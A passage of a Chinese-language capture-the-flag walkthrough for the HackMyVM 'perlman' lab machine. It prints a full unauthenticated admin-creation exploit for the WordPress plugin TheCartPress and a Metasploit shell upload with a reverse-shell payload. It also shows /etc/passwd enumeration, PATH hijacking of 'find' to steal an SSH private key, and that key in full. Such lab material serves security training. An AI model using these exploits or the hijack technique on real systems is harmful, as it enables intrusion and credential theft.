<\/div><\/p>\n\u662f\u540e\u53f0\u4e0d\u65ad\u521b\u5efa\u7ebf\u7a0b\u5bfc\u81f4\u7684\uff0c\u5c1d\u8bd5\u91cd\u542f\u5c31\u597d\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ searchsploit -m 50378 \n Exploit: WordPress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)\n URL: https:\/\/www.exploit-db.com\/exploits\/50378\n Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/50378.py\n Codes: N\/A\n Verified: True\nFile Type: Python script, ASCII text executable\nCopied to: \/home\/kali\/temp\/perlman\/50378.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ python3 50378.py \nTheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation\nAuthor -> space_hen (www.github.com\/spacehen)\nUsage: python3 exploit.py [target url]\nEx: python3 exploit.py https:\/\/example.com\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ python3 50378.py http:\/\/itzhak.perlman.hmv\nTheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation\nAuthor -> space_hen (www.github.com\/spacehen)\nInserting admin...\nSuccess!\nNow login at \/wp-admin\/<\/code><\/pre>\n# Exploit Title: WordPress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)\n# Google Dork: inurl:\/wp-content\/plugins\/thecartpress\/\n# Date: 04\/10\/2021\n# Exploit Author: spacehen\n# Vendor Homepage: https:\/\/wordpress.org\/plugin\/thecartpress\n# Version: <= 1.5.3.6\n# Tested on: Ubuntu 20.04.1\n\nimport os.path\nfrom os import path\nimport json\nimport requests;\nimport sys\n\ndef print_banner():\n print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")\n print("Author -> space_hen (www.github.com\/spacehen)")\n\ndef print_usage():\n print("Usage: python3 exploit.py [target url]")\n print("Ex: python3 exploit.py https:\/\/example.com")\n\ndef vuln_check(uri):\n response = requests.get(uri)\n raw = response.text\n if ("User name is required" in raw):\n return True;\n else:\n return False;\n\ndef main():\n\n print_banner()\n if(len(sys.argv) != 2):\n print_usage();\n sys.exit(1);\n\n base = sys.argv[1]\n\n ajax_action = 'tcp_register_and_login_ajax'\n admin = '\/wp-admin\/admin-ajax.php';\n\n uri = base + admin + '?action=' + ajax_action ;\n check = vuln_check(uri);\n\n if(check == False):\n print("(*) Target not vulnerable!");\n sys.exit(1)\n\n data = {\n "tcp_new_user_name" : "admin_02",\n "tcp_new_user_pass" : "admin1234",\n "tcp_repeat_user_pass" : "admin1234",\n "tcp_new_user_email" : "test@test.com",\n "tcp_role" : "administrator"\n }\n print("Inserting admin...");\n response = requests.post(uri, data=data )\n if (response.text == "\\"\\""):\n print("Success!")\n print("Now login at \/wp-admin\/")\n else:\n print(response.text)\n\nmain();<\/code><\/pre>\n<\/div><\/p>\n\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u627e\u4e00\u4e0b\u4e0a\u4f20\u7684\u6f0f\u6d1e\uff1ahttps:\/\/wpscan.com\/vulnerability\/a8e12fbe-c70b-4078-9015-cf57a05bdd4a\/<\/a><\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u8fdb\u884c\u4e0a\u4f20\uff0c\u4f46\u662f\u4e0d\u77e5\u9053\u4e3a\u5565\u5361\u987f\u81f3\u6781\uff0c\u4f7f\u7528msf\u5b8c\u6210\u8fd9\u4e2a\u64cd\u4f5c\uff1ahttps:\/\/www.hackingarticles.in\/wordpress-reverse-shell\/<\/a><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ msfconsole -q \nmsf6 > search wordpress admin shell upload\n\nMatching Modules\n================\n\n # Name Disclosure Date Rank Check Description\n - ---- --------------- ---- ----- -----------\n 0 exploit\/unix\/webapp\/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload\n\nInteract with a module by name or index. For example info 0, use 0 or use exploit\/unix\/webapp\/wp_admin_shell_upload\n\nmsf6 > use 0\n[*] No payload configured, defaulting to php\/meterpreter\/reverse_tcp\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > show options\n\nModule options (exploit\/unix\/webapp\/wp_admin_shell_upload):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n PASSWORD yes The WordPress password to authenticate with\n Proxies no A proxy chain of format type:host:port[,type:host:port][...]\n RHOSTS yes The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n RPORT 80 yes The target port (TCP)\n SSL false no Negotiate SSL\/TLS for outgoing connections\n TARGETURI \/ yes The base path to the wordpress application\n USERNAME yes The WordPress username to authenticate with\n VHOST no HTTP server virtual host\n\nPayload options (php\/meterpreter\/reverse_tcp):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n LHOST 10.0.2.4 yes The listen address (an interface may be specified)\n LPORT 4444 yes The listen port\n\nExploit target:\n\n Id Name\n -- ----\n 0 WordPress\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set username admin_02\nusername => admin_02\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set password admin1234\npassword => admin1234\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set rhosts itzhak.perlman.hmv\nrhosts => itzhak.perlman.hmv\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set lhost 192.168.0.143\nlhost => 192.168.0.143\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set lport 1234\nlport => 1234\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > exploit\n\n[*] Started reverse TCP handler on 192.168.0.143:1234 \n[*] Authenticating with WordPress using admin_02:admin1234...\n[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress\n[*] Exploit completed, but no session was created.<\/code><\/pre>\n\u4e0d\u884c\u3002\u3002\u3002\u3002\u770b\u4e86\u7fa4\u4e3b\u89c6\u9891\u4ee5\u540e\u53d1\u73b0\u5c06\u90e8\u5206\u8bf7\u6c42\u7ed9\u4ed6\u5c4f\u853d\u6389\uff0c\u7ed9\u4ed6block\u4e00\u4e0b\u5c31\u53ef\u4ee5\u4e86\uff01<\/p>\n
<\/div><\/p>\n\u63a5\u4e0b\u6765\u540c\u7406\uff0c\u6700\u540e\u53ef\u4ee5\u4e0a\u4f20shell\uff01<\/p>\n
<\/div>
\n<\/div><\/p>\n\u597d\u50cf\u5931\u8d25\u4e86\uff0c\u627e\u4e00\u4e0b\uff0c\u6709\u6ca1\u6709\u75d5\u8ff9\uff0c\u5728\u5a92\u4f53\u90e8\u5206\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u8bbf\u95ee\u5c1d\u8bd5\u89e6\u53d1\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u767b\u5f55rita<\/h3>\n(remote) www-data@perlman.hmv:\/$ cd ~\n(remote) www-data@perlman.hmv:\/var\/www$ cd html\n(remote) www-data@perlman.hmv:\/var\/www\/html$ ls -la\ntotal 148\ndrwxr-xr-x 8 www-data www-data 4096 Sep 10 2022 .\ndrwxr-xr-x 4 www-data www-data 4096 Jul 24 2022 ..\ndrwxr-xr-x 8 www-data www-data 4096 Sep 10 2022 .git\n-rw-r--r-- 1 www-data www-data 20454 Jul 23 2022 article-details.html\ndrwxr-xr-x 2 www-data www-data 4096 Jul 23 2022 css\ndrwxr-xr-x 2 www-data www-data 4096 Jul 23 2022 images\n-rw-r--r-- 1 www-data www-data 47426 Jul 23 2022 index.html\ndrwxr-xr-x 2 www-data www-data 4096 Jul 23 2022 js\n-rw-r--r-- 1 www-data www-data 25624 Jul 23 2022 privacy-policy.html\ndrwxr-xr-x 2 www-data www-data 4096 Jul 23 2022 removed_backup_2011\n-rw-r--r-- 1 www-data www-data 18494 Jul 23 2022 terms-conditions.html\ndrwxr-xr-x 2 www-data www-data 4096 Jul 23 2022 webfonts\n(remote) www-data@perlman.hmv:\/var\/www\/html$ sudo -l \n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@perlman.hmv:\/var\/www\/html$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nDebian-exim:x:106:112::\/var\/spool\/exim4:\/usr\/sbin\/nologin\npostfix:x:109:116::\/var\/spool\/postfix:\/usr\/sbin\/nologin\ndovecot:x:107:114:Dovecot mail server,,,:\/usr\/lib\/dovecot:\/usr\/sbin\/nologin\ndovenull:x:108:115:Dovecot login user,,,:\/nonexistent:\/usr\/sbin\/nologin\nmysql:x:110:118:MySQL Server,,,:\/nonexistent:\/bin\/false\nrita:x:1000:1000:,,,:\/home\/rita:\/bin\/bash\nmilou:x:1001:1001:,,,:\/home\/milou:\/bin\/bash\nze_perlman:x:1002:1002:,,,:\/home\/ze_perlman:\/bin\/bash\n(remote) www-data@perlman.hmv:\/var\/www\/html$ cat \/etc\/passwd | grep '\/bin\/bash' \nroot:x:0:0:root:\/root:\/bin\/bash\nrita:x:1000:1000:,,,:\/home\/rita:\/bin\/bash\nmilou:x:1001:1001:,,,:\/home\/milou:\/bin\/bash\nze_perlman:x:1002:1002:,,,:\/home\/ze_perlman:\/bin\/bash\n(remote) www-data@perlman.hmv:\/var\/www\/html$ su rita -l\nPassword: \nrita@perlman:~$ <\/code><\/pre>\n\u52ab\u6301\u547d\u4ee4\u83b7\u53d6\u79c1\u94a5<\/h3>\nrita@perlman:~$ sudo -l\n[sudo] password for rita: \nSorry, user rita may not run sudo on perlman.\nrita@perlman:~$ ls -la\ntotal 28\ndrwxr-xr-x 5 rita rita 4096 Jul 11 08:43 .\ndrwxr-xr-x 5 root root 4096 Jul 23 2022 ..\nlrwxrwxrwx 1 rita rita 9 Jul 23 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 rita rita 3526 Jul 26 2022 .bashrc\ndrwxr-xr-x 3 rita rita 4096 Jul 26 2022 .local\ndrwx------ 3 rita rita 4096 Jul 11 08:43 mail\n-rw-r--r-- 1 rita rita 808 Sep 11 2022 .profile\ndrwx------ 2 rita rita 4096 Sep 11 2022 .ssh\nrita@perlman:~$ cd mail\nrita@perlman:~\/mail$ ls -la\ntotal 12\ndrwx------ 3 rita rita 4096 Jul 11 08:43 .\ndrwxr-xr-x 5 rita rita 4096 Jul 11 08:43 ..\ndrwx------ 3 rita rita 4096 Jul 11 08:43 .imap\nrita@perlman:~\/mail$ cd .imap\/\nrita@perlman:~\/mail\/.imap$ ls -la\ntotal 20\ndrwx------ 3 rita rita 4096 Jul 11 08:43 .\ndrwx------ 3 rita rita 4096 Jul 11 08:43 ..\n-rw------- 1 rita rita 452 Jul 11 08:43 dovecot.list.index.log\n-rw------- 1 rita rita 8 Jul 11 08:43 dovecot-uidvalidity\n-r--r--r-- 1 rita rita 0 Jul 11 08:43 dovecot-uidvalidity.668f7f1f\ndrwx------ 2 rita rita 4096 Jul 11 09:00 INBOX\nrita@perlman:~\/mail\/.imap$ cd INBOX\/\nrita@perlman:~\/mail\/.imap\/INBOX$ ls -la\ntotal 16\ndrwx------ 2 rita rita 4096 Jul 11 09:00 .\ndrwx------ 3 rita rita 4096 Jul 11 08:43 ..\n-rw------- 1 rita rita 388 Jul 11 09:00 dovecot.index.cache\n-rw------- 1 rita rita 660 Jul 11 09:02 dovecot.index.log\nrita@perlman:~\/mail\/.imap\/INBOX$ cat dovecot.index.log \nhdr-pop3-uidl\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd >\ufffd\ufffd\ud04ff\ufffd(\ufffd\ufffdf\ufffd\ufffd.\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd@\ufffd\ufffd\ufffd\ufffd\nheader-md5\ufffd\ufffd\ufffd\ufffduY^\ufffd\u05c6\ufffdZ\ufffd\ufffdQ!#>!\ufffd\ufffd\ufffd\ufffd 0T$`\ufffdf\ufffd\ufffd\ufffd\ufffd \ufffd\ufffd\ufffd@\ufffd\ufffd\ufffd\ufffd@\ufffd\ufffd\ufffd\ufffdcache\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdf\ufffd\ufffd\ufffd8\ufffd\ufffd\ufffd\ufffd@\ufffd\ufffdf\ufffd\ufffd\ufffd\ufffdp\ufffd\ufffd\ufffd<\/code><\/pre>\n\u6ca1\u53d1\u73b0\u5565\u7ee7\u7eed\u641c\u96c6\uff1a<\/p>\n
rita@perlman:~\/mail\/.imap\/INBOX$ cd ~\nrita@perlman:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/pkexec\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/news\/bin\/innbind\n\/usr\/lib\/news\/bin\/rnews\n\/usr\/libexec\/polkit-agent-helper-1\nrita@perlman:~$ file \/usr\/lib\/news\/bin\/innbind\n\/usr\/lib\/news\/bin\/innbind: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=e6511c2a7e6fecb7203c28170ce4d10b91ba7565, for GNU\/Linux 3.2.0, stripped\nrita@perlman:~$ file \/usr\/lib\/news\/bin\/rnews\n\/usr\/lib\/news\/bin\/rnews: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=a70350be5f5be2d0864083120b169305c76ae0da, for GNU\/Linux 3.2.0, stripped\nrita@perlman:~$ ls -la \/usr\/lib\/news\/bin\/rnews\n-rwsr-xr-- 1 news uucp 26896 Feb 16 2021 \/usr\/lib\/news\/bin\/rnews\nrita@perlman:~$ echo $SHELL\n\/bin\/bash\nrita@perlman:~$ cat \/etc\/group | grep uucp\nuucp:x:10:\nrita@perlman:~$ ls -la \/usr\/lib\/news\/bin\/innbind\n-rwsr-xr-- 1 root news 14480 Feb 16 2021 \/usr\/lib\/news\/bin\/innbind\nrita@perlman:~$ cat \/etc\/group | grep news\nnews:x:9:\nrita@perlman:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep<\/code><\/pre>\n\u7ee7\u7eed\uff01\u4e0a\u4f20 pspy64\uff1a<\/p>\n
(remote) rita@perlman.hmv:\/tmp$ chmod +x pspy64 \n(remote) rita@perlman.hmv:\/tmp$ .\/pspy64 \nSegmentation fault<\/code><\/pre>\n\u3002\u3002\u3002\u3002\u3002\u3002\u3002\u670d\u4e86\u3002\u3002\u3002<\/p>\n
(remote) rita@perlman.hmv:\/tmp$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\n(remote) rita@perlman.hmv:\/tmp$ cd \/home\n(remote) rita@perlman.hmv:\/home$ ls -la\ntotal 20\ndrwxr-xr-x 5 root root 4096 Jul 23 2022 .\ndrwxr-xr-x 18 root root 4096 Sep 10 2022 ..\ndrwxr-xr-x 4 milou milou 4096 Sep 11 2022 milou\ndrwxr-xr-x 5 rita rita 4096 Jul 11 08:43 rita\ndrwxr-xr-x 4 ze_perlman ze_perlman 4096 Sep 11 2022 ze_perlman\n(remote) rita@perlman.hmv:\/home$ cd milou\/\n(remote) rita@perlman.hmv:\/home\/milou$ ls -la\ntotal 32\ndrwxr-xr-x 4 milou milou 4096 Sep 11 2022 .\ndrwxr-xr-x 5 root root 4096 Jul 23 2022 ..\nlrwxrwxrwx 1 root root 9 Jul 26 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 milou milou 220 Jul 26 2022 .bash_logout\n-rw-r--r-- 1 milou milou 3528 Jul 26 2022 .bashrc\n-rwxr-xr-x 1 milou milou 152 Sep 11 2022 clean.sh\ndrwxr-xr-x 3 milou milou 4096 Jul 26 2022 .local\n-rw-r--r-- 1 milou milou 883 Jul 27 2022 .profile\ndrwx------ 2 milou milou 4096 Sep 11 2022 .ssh\n(remote) rita@perlman.hmv:\/home\/milou$ cat clean.sh \n#! \/bin\/bash\n\next=(save bak bif old bck bkz sqb bak2)\n\nfor x in ${ext[@]}\ndo\ncd \/tmp && find . -type f -user $(whoami) -name "*.$x" -exec rm {} +\ndone<\/code><\/pre>\n\u627e\u5230\u4e86\u4e00\u4e2a\u5947\u602a\u7684\u811a\u672c\u770b\u4e0a\u53bb\u662f\u5b9a\u65f6\u4efb\u52a1\uff0c\u60f3\u529e\u6cd5\u8fd8\u662f\u5f97\u7528pspy64\uff0c\u4f7f\u7528ssh\u79c1\u94a5\u767b\u5f55\u518d\u4f7f\u7528wget\u4e0a\u4f20\u5c31\u80fd\u4f7f\u7528\u4e86\u3002\u3002\u3002\u3002\u3002pwncat-cs\u7684\u96f7\u70b9\uff1f\uff1f\uff1f<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u6267\u884c\u4e86 root \u7684\u4e00\u4e2a\u5b9a\u65f6\u811a\u672c\u4ee5\u53ca \u521a\u521a\u627e\u5230\u7684\u90a3\u4e2a\u5b9a\u65f6\u811a\u672c\uff0c\u800c\u4e14\u52a0\u8f7d\u4e86\u4e2a\u4eba\u8bbe\u7f6e\uff1a<\/p>\n
rita@perlman:\/tmp$ cat \/home\/milou\/.profile \n# ~\/.profile: executed by the command interpreter for login shells.\n# This file is not read by bash(1), if ~\/.bash_profile or ~\/.bash_login\n# exists.\n# see \/usr\/share\/doc\/bash\/examples\/startup-files for examples.\n# the files are located in the bash-doc package.\n\n# the default umask is set in \/etc\/profile; for setting the umask\n# for ssh logins, install and configure the libpam-umask package.\n#umask 022\n\n# if running bash\nif [ -n "$BASH_VERSION" ]; then\n # include .bashrc if it exists\n if [ -f "$HOME\/.bashrc" ]; then\n . "$HOME\/.bashrc"\n fi\nfi\n\n# set PATH so it includes user's private bin if it exists\nif [ -d "$HOME\/bin" ] ; then\n PATH="$HOME\/bin:$PATH"\nfi\n\n# set PATH so it includes user's private bin if it exists\nif [ -d "$HOME\/.local\/bin" ] ; then\n PATH="$HOME\/.local\/bin:$PATH"\nfi\n\nexport PATH=.:\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games<\/code><\/pre>\n\u56e0\u4e3a\u8def\u5f84\u4f18\u5148\u7ea7\u662f\u5f53\u524d\u76ee\u5f55\u6240\u4ee5\uff1a<\/p>\n
cd \/tmp && find . -type f -user $(whoami) -name "*.$x" -exec rm {} +<\/code><\/pre>\n\u53ef\u4ee5\u8fdb\u884c\u52ab\u6301find<\/code>\u547d\u4ee4\uff01<\/p>\nrita@perlman:\/tmp$ cat find\ncp \/home\/milou\/.ssh\/id_rsa \/tmp\/flag && chmod 666 \/tmp\/flag\nrita@perlman:\/tmp$ chmod +x find\nrita@perlman:\/tmp$ cat flag\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAqbS3htQvnVwWEyQl8L1mDdnZzxHiTrP+iqmx\/LUR\/SZ+\/8bMk7c2\nKGTBZZFt3fZnF6VejwhIdm06mWtFWAIuUrr2MyUNl+QbWhG3kL\/NGPQcKoqyEgOIOkKb1V\nMr4m5k5C5Cprh3c96YVWZTVqs\/tqDBVFJ+nMlV+zJ7vbSmfJ84a2h\/h9\/ZQ+EeP97jjXhN\nGZa5Q14wons2oEsHrepmyDYlRs3a9nZe0NNq5\/FPehvNYGRvAxUwDMRTDcAATqDVL3TPln\naD02kAoJ9VQ34elDOu9X777h\/o26VudlpfHd+dYqIhfwPv5WB5bt0PXCIoYiCiA4pTWGb1\n6EOq4qR9SUJsWfmDEEG+nVjUn+ZtfHxduUG4bj2b6+ucfr\/plCvIUpnosc7x97UGh5vXxF\nRfJeBjcqEZENjSKtpuQn6OTCJ1qRcFW0bCKiUr1rUq0WFNPke9X0qXBIkfiyU2mhtIGpty\nBQHLBoSSMXEfHogB+UV9BJ4gm58ohejY3r2kB3MJAAAFiOkpltbpKZbWAAAAB3NzaC1yc2\nEAAAGBAKm0t4bUL51cFhMkJfC9Zg3Z2c8R4k6z\/oqpsfy1Ef0mfv\/GzJO3NihkwWWRbd32\nZxelXo8ISHZtOplrRVgCLlK69jMlDZfkG1oRt5C\/zRj0HCqKshIDiDpCm9VTK+JuZOQuQq\na4d3PemFVmU1arP7agwVRSfpzJVfsye720pnyfOGtof4ff2UPhHj\/e4414TRmWuUNeMKJ7\nNqBLB63qZsg2JUbN2vZ2XtDTaufxT3obzWBkbwMVMAzEUw3AAE6g1S90z5Z2g9NpAKCfVU\nN+HpQzrvV+++4f6NulbnZaXx3fnWKiIX8D7+VgeW7dD1wiKGIgogOKU1hm9ehDquKkfUlC\nbFn5gxBBvp1Y1J\/mbXx8XblBuG49m+vrnH6\/6ZQryFKZ6LHO8fe1Boeb18RUXyXgY3KhGR\nDY0irabkJ+jkwidakXBVtGwiolK9a1KtFhTT5HvV9KlwSJH4slNpobSBqbcgUBywaEkjFx\nHx6IAflFfQSeIJufKIXo2N69pAdzCQAAAAMBAAEAAAGAFg\/wbA7ZwdNe604fwJRe2B4iOt\nFQYnrz9ILrKLdBh2+hww7NOcbvu4Cdw96MMfb+oAxXprCk+wBoRdm0QiTGcOrtZujCQ6Tc\nCXGUM7U7rKrPnpg5Xi4nX6uZJrqRUfaYFzIMaDBDF0Uw+Kk83F+XAN8VQykWXLuv+eAuRh\nNeMYVhiFUlfzySukhh7lvDqXiiTVlS7HcqS3VJPL2EWg\/HHPAtGG9ar\/\/jg7J4i37LnkxO\n\/uEPrY7rmD1NrtPvNkmiNzN5cq9w30Ve9wt4nQMHpNZ+KZYojJcEVxI9qWF8wB3Rxx4pGJ\nQmvhBcZLNa+vwmhqweJ7MO2cMwdJI5BWf21TAGf\/8NQ0hoGDE0Yy2lwCVTh5Ow2xBIyV4x\nOBVl3IR0\/HSeP8p48Mh1BjhxTfpGl58C1DaH0lgk8AzmhY5Vt2WZXzd+XXm5za1KWHJcWL\nsoBlKTWPmHvaFyhnyJulrh53\/\/R\/bdgAGHjhHm63+QMlDbr7rELSmUxfyuuzx5QjqBAAAA\nwDZTWnAXApcfOvHYZ8hP6zGQybXKbVRW7SgSPjI0rJSvVsoIm\/L0NNnicDZEg5EOfuGDTk\nv1Pu8iNYF8uyXhU1ZMn81oAfK\/qWWY\/AMEmUJQt3Dp0jLQf\/n3rypRTPOotzhCQMV0ipxX\n3a\/BwR9QeNf1181S\/klWroa96epRtALzzKs0NTAg0cbmAHBDAkef4tbNBM2PRlYN+32Iyt\nVDppjsH9dX1+cWVxwenjtwQXkr4Vzo1sHADVB1rn9khroe6wAAAMEA2Th9DGLdXIUUx+J6\nw6yR6OxMgxUF4HJdP0GogQYqx93VqsXQY9GC0vMIrQNxQF+00uHyMztyOAaT9r3BoQgMq7\nvqM6W2kS5NSq1O7MbBV7ZBMA8ngWWOVvur0MaCv8vJmGA14RpD8Wo8NZuE6KAaP8d03ct+\n6EFv7Lk7shaa0QfsC2RF1h4bp\/gLG1aqhUEsepIiQH7D1WKeXmuF0Usd8wohYFKlTTrFm+\npjXbBXj25mX1hBJ1F1y6kfx+8JFN9VAAAAwQDIALCU3fCJ7sqKyGbdNxamC+vwezQ6ZptK\n8e70JxHqAEfuL\/YKsZrqyt9rFP\/9vR4kMsNo6QDzmve0YyEI2lRWKw4MMzCpsUSYVwNI0Q\nqtdIOCfYzgT2duv4wDlujQsx6rg6clDlFh1VACRc51b9169j6HkqgS9WRmdSGp+vZu\/Dol\nuY0h4YVayCtgXaLRjIPBOj46iH+PBkohdLJCi4eWze0hA5hqtvFfo221lyJN7MhD96IpIi\nHLRZcy1a50\/OUAAAARbWlsb3VAcGVybG1hbi5obXYBAg==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<\/div><\/p>\nbash\u7279\u6027\u6267\u884c\u547d\u4ee4<\/h3>\nmilou@perlman:~$ sudo -l\nMatching Defaults entries for milou on perlman:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser milou may run the following commands on perlman:\n (ze_perlman) NOPASSWD: \/bin\/bash \/home\/ze_perlman\/inventory\nmilou@perlman:~$ file \/home\/ze_perlman\/inventory\n\/home\/ze_perlman\/inventory: Bourne-Again shell script, ASCII text executable\nmilou@perlman:~$ cat \/home\/ze_perlman\/inventory\n#! \/bin\/bash\n\necho -e "\\n+IT Inventory+\\n"\ngreen=$(tput setaf 2)\nbold=$(tput bold)\nnormal=$(tput sgr0)\n\nwhile IFS=, read item brand price numb\ndo\n subtotal=$((numb*price))\n echo -e "Item:\\t\\t ${bold}$item${normal}" \n echo -e "Brand:\\t\\t $brand"\n echo -e "Price\/Unit:\\t $price$" \n echo -e "Quantity:\\t $numb pcs"\n echo -e "Subtotal:\\t $subtotal$"\n echo ""\n\nfor x in ${subtotal[@]}\ndo\n(( total+=x ))\ndone\n\nsum=0\nfor i in "${total[@]}"\ndo\n (( sum+=i ))\ndone\n\ndone < <(cat perl_store.csv |sed -n '1!p')\n\necho -e "\\nTotal cost: \\t ${bold}${green}$sum$"\nmilou@perlman:~$ sudo -u ze_perlman \/bin\/bash \/home\/ze_perlman\/inventory\n\n+IT Inventory+\n\ncat: perl_store.csv: No such file or directory\n\nTotal cost: $<\/code><\/pre>\n\u56de\u5230\u5176\u5bb6\u76ee\u5f55\u5c1d\u8bd5\u8fd0\u884c\uff1a<\/p>\n
